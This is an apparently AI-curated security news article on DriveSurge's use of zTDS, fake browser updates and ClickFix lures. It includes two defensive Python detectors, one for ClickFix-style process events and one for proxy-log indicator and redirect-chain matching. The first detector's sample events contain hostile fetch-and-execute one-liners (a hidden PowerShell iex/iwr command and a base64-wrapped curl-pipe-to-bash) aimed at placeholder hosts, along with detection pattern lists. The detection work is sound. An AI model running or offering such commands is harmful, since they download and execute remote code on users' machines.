
DriveSurge Compromises Legitimate Websites for Initial Access Attacks

Bottom line: DriveSurge compromises thousands of legitimate websites, uses the zTDS traffic distribution system to steer their visitors into fake browser update (FakeUpdates) or ClickFix lures, and sells the resulting system access to other cybercriminals.

The threat group DriveSurge compromises thousands of reputable websites, redirects their visitors to malware infrastructure, and sells the initial access it gains to other cybercriminals. Security firm SilentPush has documented the group's use of zTDS, fake browser updates, and ClickFix lures since at least September 2025.

DriveSurge operates as an Initial Access Broker: the group compromises high-reputation legitimate websites and silently redirects their visitors to a malicious distribution infrastructure. The resulting access is then sold on a pay-per-install basis to other cybercriminals, who use it for ransomware, espionage, or data theft.

The core component is the Traffic Distribution System zTDS, an open-source traffic-steering application known since at least 2015. When a visitor loads a compromised website, zTDS redirects them in the background and profiles them in real time: operating system, browser type, and geographic location are used to pick the infection lure most likely to succeed. Because that choice is made per visitor, the same compromised page can serve different content to different people, so a single analyst visit from an unusual browser or location may see nothing malicious at all.

DriveSurge employs two attack scenarios. FakeUpdates displays fake update notifications for Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, and UC Browser and delivers malicious ZIP archives containing, for example, a "Browser Update.exe" together with its Dynamic Link Libraries (DLLs). ClickFix is a social engineering tactic: the page claims that something failed to load and instructs the user to type or paste a supplied command into the Windows Command Prompt or PowerShell. Because the user runs the command themselves, the first stage never arrives as a browser download, which is what makes the technique attractive to the attacker. Security analysts at SilentPush also identified variants targeting macOS that use obfuscated JavaScript to hijack the clipboard and inject malicious terminal commands, so that what the user pastes is not what they copied.
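The pasted command is the one artefact of a ClickFix attack that every endpoint sees, whichever website delivered it. The following detector, an added example that is neither SilentPush's tooling nor anything from the DriveSurge campaign, scores process-creation events for the combination a ClickFix "fix" produces: a download or decode cradle, in a shell that a human started from Explorer or Terminal, often with flags that hide the window. The event schema, hostnames and sample records are constructed for the illustration; the Windows and macOS samples mirror the two variants described above.

```python
"""Heuristic detection of ClickFix-style command execution in process telemetry.

Added example: not code from SilentPush or the DriveSurge campaign. The event
schema, the sample records and the hostnames below are constructed.
"""
import re
from dataclasses import dataclass

# Fragments that fetch or decode remote code; a "fix" a web page asks the
# user to paste has no legitimate reason to contain them.
DOWNLOAD_CRADLES = [
    r"invoke-webrequest", r"\biwr\b", r"downloadstring", r"invoke-expression",
    r"\biex\b", r"\bmshta\b", r"\bcurl\b", r"\bwget\b", r"\bbitsadmin\b",
    r"\bcertutil\b", r"frombase64string", r"\bbase64\s+(-d|--decode)",
    r"\|\s*(ba|z)?sh\b", r"-enc(odedcommand)?\b",
]
# Flags that keep the window, profile or policy out of the user's sight.
STEALTH_FLAGS = [
    r"-w(indowstyle)?\s+hidden", r"-nop(rofile)?\b", r"-(ep|executionpolicy)\s+bypass",
    r"&>\s*/dev/null", r">\s*/dev/null\s+2>&1",
]
# Parents from which a human, not a scheduler or agent, starts a shell.
HUMAN_PARENTS = {"explorer.exe", "Terminal", "Finder", "iTerm2"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "zsh", "sh"}


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent: str   # parent image name
    image: str    # process image name
    cmdline: str


def assess(ev: ProcessEvent) -> tuple[bool, list[str]]:
    """Return (is_clickfix_like, reasons).

    Alert only when a download/decode cradle is present AND either a human
    launched the shell or stealth flags are used, so a management agent
    running a script with -NoProfile alone does not fire.
    """
    reasons: list[str] = []
    if ev.image not in SHELLS:
        return False, reasons
    cl = ev.cmdline.lower()
    cradles = [p for p in DOWNLOAD_CRADLES if re.search(p, cl)]
    if not cradles:
        return False, reasons
    reasons.append(f"download/decode cradle: {len(cradles)} pattern(s)")
    if ev.parent in HUMAN_PARENTS:
        reasons.append(f"shell started interactively by {ev.parent}")
    stealth = [p for p in STEALTH_FLAGS if re.search(p, cl)]
    if stealth:
        reasons.append(f"stealth flags: {len(stealth)} pattern(s)")
    return len(reasons) >= 2, reasons


def flag_events(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Return (host, reasons) for every event that looks like ClickFix."""
    out = []
    for ev in events:
        hit, reasons = assess(ev)
        if hit:
            out.append((ev.host, reasons))
    return out


# Constructed sample telemetry (hostnames, users and URLs are placeholders).
SAMPLE_EVENTS = [
    # Windows ClickFix: the user opened PowerShell and pasted the "fix".
    ProcessEvent("WS-0417", "jdoe", "explorer.exe", "powershell.exe",
                 'powershell.exe -w hidden -c "iex (iwr http://update-check.invalid/fix.ps1 -UseBasicParsing)"'),
    # macOS variant: clipboard-injected one-liner pasted into Terminal
    # (the base64 blob is an opaque placeholder; the heuristic never decodes it).
    ProcessEvent("MBP-22", "asmith", "Terminal", "zsh",
                 "zsh -c 'echo Y3VybCAtZnNTTCBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL2EgfCBiYXNo | base64 -d | bash'"),
    # Benign: a management agent runs a local script non-interactively.
    ProcessEvent("WS-0098", "SYSTEM", "mgmt-agent.exe", "powershell.exe",
                 "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),
    # Benign: a user runs ipconfig from a cmd window they opened themselves.
    ProcessEvent("WS-0101", "mlee", "explorer.exe", "cmd.exe", "cmd.exe /c ipconfig /all"),
]

if __name__ == "__main__":
    for host, reasons in flag_events(SAMPLE_EVENTS):
        print(host, "->", "; ".join(reasons))
```

The two-signal rule is the important design choice: a download cradle alone is common in legitimate automation, and an interactively launched shell alone is every help-desk session, but the combination is exactly what a user following ClickFix instructions produces. Tune `HUMAN_PARENTS` to whatever your EDR reports as the parent of a shell opened from the Run dialog, Spotlight or a terminal app.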

The researchers isolated eight specific technical fingerprints that identify DriveSurge infrastructure and the websites it has compromised. For CISOs this means: matching web proxy and DNS telemetry against these fingerprints can reveal active campaigns and flag early when internal systems make contact with zTDS systems. The fingerprints describe the infrastructure, not the lure, so pairing them with host-side detection of the commands ClickFix asks users to run covers the visitors the TDS has already redirected.
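What the cross-referencing looks like in practice, as an added example that is not SilentPush's tooling: the eight published fingerprints are not reproduced here, so the indicator sets, domains and proxy log lines below are constructed placeholders a defender would replace with the real ones. The script does two things: a per-request match against known zTDS hosts and FakeUpdates-style paths, and a per-client chain check that catches the sequence the article describes (a reputable site, a third-party fetch it triggered, then a "browser update" ZIP from somewhere else) even when the TDS host is not yet on any list.

```python
"""Match proxy logs against zTDS/FakeUpdates fingerprints and redirect chains.

Added example, not SilentPush's tooling. The eight published fingerprints are
not reproduced here; the indicator sets, domains and log lines are constructed
placeholders a defender would swap for the real ones.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# --- indicators (hypothetical placeholders) --------------------------------
KNOWN_TDS_HOSTS = {"tds-relay.invalid", "cdn-metrics-check.invalid"}
LURE_PATH = re.compile(r"^/update/(chrome|firefox|edge|safari|opera|brave|yandex|vivaldi)\b", re.I)
LURE_ZIP = re.compile(r"(browser|chrome|firefox|edge)[\s_-]*update[^/]*\.zip$", re.I)
# Sites the organisation already treats as reputable: the compromised-site end
# of the chain. Real lists are large; two entries are enough for the demo.
REPUTABLE_HOSTS = {"www.example-news.test", "blog.example-vendor.test"}
CHAIN_WINDOW = timedelta(seconds=120)

# Constructed log format: "<iso8601> <client> <method> <url> <status> <referer|->"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+)$")


@dataclass(frozen=True)
class Request:
    ts: datetime
    client: str
    host: str
    path: str
    status: int
    referer_host: str | None


def parse_line(line: str) -> Request | None:
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, _method, url, status, referer = m.groups()
    u = urlsplit(url)
    ref_host = urlsplit(referer).hostname if referer != "-" else None
    return Request(datetime.fromisoformat(ts.replace("Z", "+00:00")), client,
                   u.hostname or "", u.path or "/", int(status), ref_host)


def static_hits(req: Request) -> list[str]:
    """Per-request indicator matches: the fingerprint cross-reference itself."""
    hits = []
    if req.host in KNOWN_TDS_HOSTS:
        hits.append("known zTDS host")
    if LURE_PATH.search(req.path):
        hits.append("FakeUpdates lure path")
    if LURE_ZIP.search(req.path):
        hits.append("browser-update ZIP download")
    return hits


def chain_hits(reqs: list[Request]) -> list[str]:
    """Per-client behaviour: a third-party fetch referred by a reputable site,
    followed within CHAIN_WINDOW by a browser-update ZIP from a non-reputable
    host. This flags a compromised site even when its TDS host is unknown."""
    hits = []
    pivots = []  # (time, reputable referer, third-party host)
    for r in sorted(reqs, key=lambda r: r.ts):
        if r.referer_host in REPUTABLE_HOSTS and r.host not in REPUTABLE_HOSTS:
            pivots.append((r.ts, r.referer_host, r.host))
        if LURE_ZIP.search(r.path) and r.host not in REPUTABLE_HOSTS:
            for t, ref, third in pivots:
                if timedelta(0) <= r.ts - t <= CHAIN_WINDOW:
                    hits.append(f"{ref} -> {third} -> {r.host}{r.path}")
                    break
    return hits


def scan(lines) -> dict[str, list[str]]:
    """Return {client: [finding, ...]} for every client with at least one hit."""
    by_client: dict[str, list[Request]] = defaultdict(list)
    findings: dict[str, list[str]] = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        by_client[req.client].append(req)
        for h in static_hits(req):
            findings[req.client].append(f"{h}: {req.host}{req.path}")
    for client, reqs in by_client.items():
        for h in chain_hits(reqs):
            findings[client].append(f"redirect chain: {h}")
    return dict(findings)


# Constructed sample log: one infection chain and one benign third-party fetch.
SAMPLE_LOG = """\
2026-06-01T10:00:01Z 10.1.2.3 GET https://www.example-news.test/article/42 200 -
2026-06-01T10:00:02Z 10.1.2.3 GET https://tds-relay.invalid/go?z=7 302 https://www.example-news.test/article/42
2026-06-01T10:00:03Z 10.1.2.3 GET https://update-check.invalid/update/chrome 200 https://www.example-news.test/article/42
2026-06-01T10:00:09Z 10.1.2.3 GET https://update-check.invalid/dl/Browser_Update.zip 200 https://update-check.invalid/update/chrome
2026-06-01T10:05:00Z 10.1.2.9 GET https://blog.example-vendor.test/ 200 -
2026-06-01T10:05:01Z 10.1.2.9 GET https://static.example-cdn.test/app.js 200 https://blog.example-vendor.test/
""".splitlines()

if __name__ == "__main__":
    for client, found in scan(SAMPLE_LOG).items():
        print(client)
        for f in found:
            print("  ", f)
```

The second client shows why the chain check needs the ZIP download as its second leg: reputable sites legitimately pull scripts from CDNs, so "third-party fetch from a trusted referer" alone would page on every visit. The indicator match and the chain check are complementary, since the first is precise but only as current as the list, and the second survives the TDS host changing.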


Source: www.it-daily.net · Published June 7, 2026
Lumi AI News — AI-assisted curation in accordance with Article 50 EU AI Act. Paraphrase and classification via Lumi News Pipeline v1.6.5.
